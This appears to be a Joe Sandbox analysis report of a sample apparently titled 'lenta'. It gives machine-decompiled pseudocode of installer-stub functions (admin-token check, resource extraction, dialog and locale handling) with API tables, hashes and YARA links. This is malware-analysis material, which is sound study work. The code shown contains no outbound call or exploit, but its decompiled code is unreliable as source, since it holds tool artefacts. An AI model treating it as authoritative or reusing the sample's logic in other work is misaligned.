0x010819bf
0x00000000
0x010819bd
0x010818fa
0x00000000
0x00000000
0x01081912
0x010819aa
0x010819ad
0x010819b3
0x00000000
0x01081927
0x01081927
0x01081932
0x01081936
0x010819a9
0x010819a9
0x00000000
0x010819a9
0x0108194c
0x010819a2
0x010819a3
0x00000000
0x0108196e
0x01081970
0x01081999
0x0108199c
0x00000000
0x0108199c
0x01081972
0x01081972
0x01081975
0x01081984
0x01081985
0x0108198a
0x00000000
0x00000000
0x00000000
0x0108198c
0x01081991
0x01081996
0x00000000
0x01081996
0x0108194c

APIs

Part of subcall function 010817EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010818DD), ref: 0108181A
Part of subcall function 010817EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0108182C
Part of subcall function 010817EE: AllocateAndInitializeSid.ADVAPI32(010818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010818DD), ref: 01081855
Part of subcall function 010817EE: FreeSid.ADVAPI32(?,?,?,?,010818DD), ref: 01081883
Part of subcall function 010817EE: FreeLibrary.KERNEL32(00000000,?,?,?,010818DD), ref: 0108188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 010818EB
OpenProcessToken.ADVAPI32(00000000), ref: 010818F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0108190A
GetLastError.KERNEL32 ref: 01081918
LocalAlloc.KERNEL32(00000000,?,?), ref: 0108192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 01081944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 01081964
EqualSid.ADVAPI32(00000004,?), ref: 0108197A
FreeSid.ADVAPI32(?), ref: 0108199C
LocalFree.KERNEL32(00000000), ref: 010819A3
CloseHandle.KERNEL32(?), ref: 010819AD

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: 19d5fbddee5b3aad58bff11b85c0fe47460e23f06ef38e222093cc48e4a5d3d9
Instruction ID: 73d49e41e583a7ccf426acf36d071b69a36400cb527009413cd472e934d754e9
Opcode Fuzzy Hash: 19d5fbddee5b3aad58bff11b85c0fe47460e23f06ef38e222093cc48e4a5d3d9
Instruction Fuzzy Hash: A7313E71A08209EFDB61EFA5DC48AAFBBBCFF04750B10446AF6C5D2144D73A9906CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0108468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0108468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}

0x01084699
0x0108469b
0x010846a9
0x010846af
0x010846b4
0x010846bc
0x010846f9
0x00000000
0x010846f9
0x010846d9
0x010846dd
0x00000000
0x00000000
0x010846e5
0x010846ef
0x00000000
0x010846f5
0x010846ff

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010846A0
SizeofResource.KERNEL32(00000000,00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010846C3
LoadResource.KERNEL32(00000000,00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846CC
LockResource.KERNEL32(00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846D3
memcpy_s.MSVCRT ref: 010846E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010846EF

Strings

TITLE, xrefs: 0108469D, 010846C0
lenta, xrefs: 010846E4

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$lenta
API String ID: 3370778649-2035842925
Opcode ID: da8d3422023518171b4d1b8627b680cb780820af409cc5a98aa4249d689f52a6
Instruction ID: a9fd769f4c52a3d2b23700d94017058a61629e211f03a2431468eb4e3dc14974
Opcode Fuzzy Hash: da8d3422023518171b4d1b8627b680cb780820af409cc5a98aa4249d689f52a6
Instruction Fuzzy Hash: A201A232348211FBE33027A96C0CF2F3E6CDB89B65F080015FBC9D7184CD66885587A2

Uniqueness

Uniqueness Score: -1.00%

Function 010817EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E010817EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x108a288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E01086CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x010817f6
0x010817fd
0x01081805
0x0108180b
0x0108180d
0x01081815
0x01081818
0x01081820
0x01081824
0x0108182c
0x01081832
0x01081837
0x01081851
0x01081854
0x0108185d
0x01081862
0x0108186c
0x01081872
0x01081877
0x0108187e
0x0108187e
0x01081883
0x01081883
0x0108185d
0x0108188a
0x0108188a
0x010818a2

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010818DD), ref: 0108181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0108182C
AllocateAndInitializeSid.ADVAPI32(010818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010818DD), ref: 01081855
FreeSid.ADVAPI32(?,?,?,?,010818DD), ref: 01081883
FreeLibrary.KERNEL32(00000000,?,?,?,010818DD), ref: 0108188A

Strings

advapi32.dll, xrefs: 01081810
CheckTokenMembership, xrefs: 01081826

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: 619c9f53acb9953a34710d67e2aa60bb586bd0790d3c7072eed5eb3fd982ee24
Instruction ID: 24eda272a8225c1d8c8d33f12b5f108b12d4690f30836d5eb764bbe689f4dd60
Opcode Fuzzy Hash: 619c9f53acb9953a34710d67e2aa60bb586bd0790d3c7072eed5eb3fd982ee24
Instruction Fuzzy Hash: B9116A71F04209EFDB10AFA5DC49ABEBBB8EF44701F10016AFAC5E7240DA7599028B91

Uniqueness

Uniqueness Score: -1.00%

Function 01083450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01083450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E010843D0(_t24, _t12);
					SetWindowTextA(_t24, "lenta");
					SetDlgItemTextA(_t24, 0x838,  *0x1089404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x10891dc = 1;
					goto L8;
				}
				return 0;
			}

0x01083459
0x0108345c
0x010834d8
0x010834de
0x00000000
0x010834e0
0x0108345e
0x01083463
0x0108349a
0x010834a0
0x010834a7
0x010834b2
0x010834c4
0x010834cb
0x00000000
0x010834cb
0x01083468
0x0108346e
0x01083474
0x00000000
0x00000000
0x0108347c
0x0108348c
0x01083490
0x00000000
0x01083496
0x01083484
0x00000000
0x00000000
0x01083486
0x00000000
0x01083486
0x00000000

APIs

EndDialog.USER32(?,?), ref: 01083490
GetDesktopWindow.USER32 ref: 0108349A
SetWindowTextA.USER32(?,lenta), ref: 010834B2
SetDlgItemTextA.USER32(?,00000838), ref: 010834C4
SetForegroundWindow.USER32(?), ref: 010834CB
EndDialog.USER32(?,00000002), ref: 010834D8

Strings

lenta, xrefs: 010834AC

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: lenta
API String ID: 852535152-2780258678
Opcode ID: 9d151020186897e63986d35e9873420fbb32aa150ed3c5eb5fd6f0d6675b6d04
Instruction ID: 58b90545c931aafd861c1389da873fce1b58396fac0a834d7555ecd1b49849f0
Opcode Fuzzy Hash: 9d151020186897e63986d35e9873420fbb32aa150ed3c5eb5fd6f0d6675b6d04
Instruction Fuzzy Hash: 58019E3534C114ABDB667F6DD80C9AE3AA4FB85B50B005415FAC68A984CE7AEA51CB80

Uniqueness

Uniqueness Score: -1.00%

Function 01082AAC Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E01082AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x1088004; // 0x4f5b7a6c
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x1089a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E01081680(_t65, E010817C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E010865E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E01081680(_t65, E010817C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E01086CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}

0x01082aac
0x01082ab7
0x01082abc
0x01082abe
0x01082ac3
0x01082ac6
0x01082ac9
0x01082ace
0x01082ae6
0x01082bdc
0x01082bdc
0x01082be0
0x00000000
0x00000000
0x01082af2
0x01082afc
0x01082b00
0x01082b05
0x01082b05
0x01082b0b
0x01082bca
0x01082bd1
0x01082b11
0x01082b18
0x01082b26
0x01082b99
0x01082bc8
0x00000000
0x00000000
0x01082b9b
0x01082bae
0x01082bb3
0x01082bb5
0x01082bb5
0x01082bb8
0x01082bb8
0x01082bba
0x01082bbb
0x00000000
0x01082bb8
0x01082b28
0x01082b2e
0x01082b33
0x01082b39
0x01082b3c
0x01082b3c
0x01082b3e
0x01082b3f
0x01082b55
0x01082b5d
0x01082b64
0x01082b64
0x01082b7a
0x01082b7f
0x01082b81
0x01082b81
0x01082b84
0x01082b84
0x01082b86
0x01082b87
0x01082bbf
0x01082bc1
0x01082bc1
0x01082b26
0x01082bda
0x01082bda
0x01082be6
0x01082be6
0x01082bf8

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 01082AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 01082AF2
CharNextA.USER32(?), ref: 01082B12
CharUpperA.USER32 ref: 01082B1E
CharPrevA.USER32(?,?), ref: 01082B55
CharNextA.USER32(?), ref: 01082BD4

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: 810346cea075cfc6ec0b938acbb2701e7b8239d072a810f29ca4a2dce8d4a0fa
Instruction ID: b5633d907eb8141c0c00c8b67ef1f419cbfdaaef9c925ce458dd745d16ac63e8
Opcode Fuzzy Hash: 810346cea075cfc6ec0b938acbb2701e7b8239d072a810f29ca4a2dce8d4a0fa
Instruction Fuzzy Hash: B9412A3460D1459FDF66BF388854AFE7FA99F56350F0400DAD8C287602DB3A8E46CB60

Uniqueness

Uniqueness Score: -1.00%

Function 010843D0 Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E010843D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E01086CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x010843d0
0x010843d8
0x010843df
0x010843e6
0x010843ec
0x010843f1
0x01084400
0x01084403
0x0108440b
0x01084420
0x01084429
0x01084437
0x01084444
0x01084447
0x0108444d
0x01084454
0x0108445b
0x01084460
0x01084461
0x01084467
0x0108446f
0x01084473
0x01084473
0x01084463
0x01084463
0x01084463
0x0108447a
0x01084481
0x01084484
0x0108448a
0x01084492
0x01084496
0x01084496
0x01084486
0x01084486
0x01084486
0x010844b8

APIs

GetWindowRect.USER32(?,?), ref: 010843F1
GetWindowRect.USER32(00000000,?), ref: 0108440B
GetDC.USER32(?), ref: 01084423
GetDeviceCaps.GDI32(00000000,00000008), ref: 0108442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0108443A
ReleaseDC.USER32(?,00000000), ref: 01084447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 010844A2

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: 3118640c1b8f1303eaf2c7ca5fddda631300ab40fb521ce4e35dc1e2ea5885ec
Instruction ID: abfe4b6e90ce64a8a3b5465b078f22fa055a1307f12d7e99778e8242e48d0a70
Opcode Fuzzy Hash: 3118640c1b8f1303eaf2c7ca5fddda631300ab40fb521ce4e35dc1e2ea5885ec
Instruction Fuzzy Hash: 79313832E04119AFCF14DEB8D9889EEBBB5EB89310F154169F885F3244DA35AC058B60

Uniqueness

Uniqueness Score: -1.00%

Function 01086298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E01086298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E0108171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x1089124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x108a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E0108171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E01086CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x01086298
0x010862a0
0x010862a7
0x010862ad
0x010862af
0x010862bb
0x010862c3
0x010862c4
0x0108633b
0x0108633b
0x01086345
0x0108634d
0x00000000
0x00000000
0x010862da
0x010862de
0x0108635f
0x01086369
0x010862e0
0x010862e0
0x010862e0
0x010862e3
0x010862e5
0x010862e5
0x010862e8
0x010862e8
0x010862ea
0x010862eb
0x010862ef
0x010862f1
0x010862f3
0x01086302
0x01086308
0x0108630d
0x01086314
0x01086314
0x01086316
0x01086319
0x01086355
0x01086357
0x0108631b
0x0108631b
0x01086331
0x01086334
0x01086339
0x00000000
0x01086339
0x01086319
0x0108636b
0x0108637d
0x0108637d
0x00000000

APIs

Part of subcall function 0108171E: _vsnprintf.MSVCRT ref: 01081750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,010851CA,00000004,00000024,01082F71,?,00000002,00000000), ref: 010862CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,010851CA,00000004,00000024,01082F71,?,00000002,00000000), ref: 010862D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010851CA,00000004,00000024,01082F71,?,00000002,00000000), ref: 0108631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 01086345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010851CA,00000004,00000024,01082F71,?,00000002,00000000), ref: 01086357

Strings

UPDFILE%lu, xrefs: 010862B3, 01086329

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: b87fdb62eee8c5d127b5f24f3ef861a8743b300d35bcf8100e2aa1e218cf928d
Instruction ID: 415a889b7fc483eb185df2d8d44850c79a9b19bb320008266e05848120c51169
Opcode Fuzzy Hash: b87fdb62eee8c5d127b5f24f3ef861a8743b300d35bcf8100e2aa1e218cf928d
Instruction Fuzzy Hash: F121F671A08219AFDB20BF64DC449FE7B78FF44714B01415AFAC2A7641DB3B99028BE0

Uniqueness

Uniqueness Score: -1.00%

Function 0108681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0108681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t19 ^ _t44;
				_t41 =  *0x10881d8; // 0xfffffffe
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x10881d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x10881d8; // 0xfffffffe
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x1081140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E010866F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x10881d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E01086CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}

0x0108681f
0x0108682a
0x01086831
0x01086836
0x0108683c
0x0108683e
0x01086848
0x01086851
0x0108685d
0x01086864
0x01086876
0x0108693a
0x0108693a
0x0108687c
0x0108687e
0x01086885
0x00000000
0x010868d6
0x010868f4
0x01086900
0x01086902
0x0108690a
0x00000000
0x0108690c
0x0108690c
0x0108691c
0x00000000
0x0108691e
0x01086924
0x0108692b
0x01086932
0x00000000
0x00000000
0x00000000
0x0108692b
0x0108691c
0x0108690a
0x01086885
0x01086876
0x01086951

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0108686E
GetSystemMetrics.USER32(0000004A), ref: 010868A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010868CC
RegQueryValueExA.ADVAPI32(?,01081140,00000000,?,?,0000000C), ref: 010868F4
RegCloseKey.ADVAPI32(?), ref: 01086902

Part of subcall function 010866F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0108691A), ref: 01086741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 010868C2

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

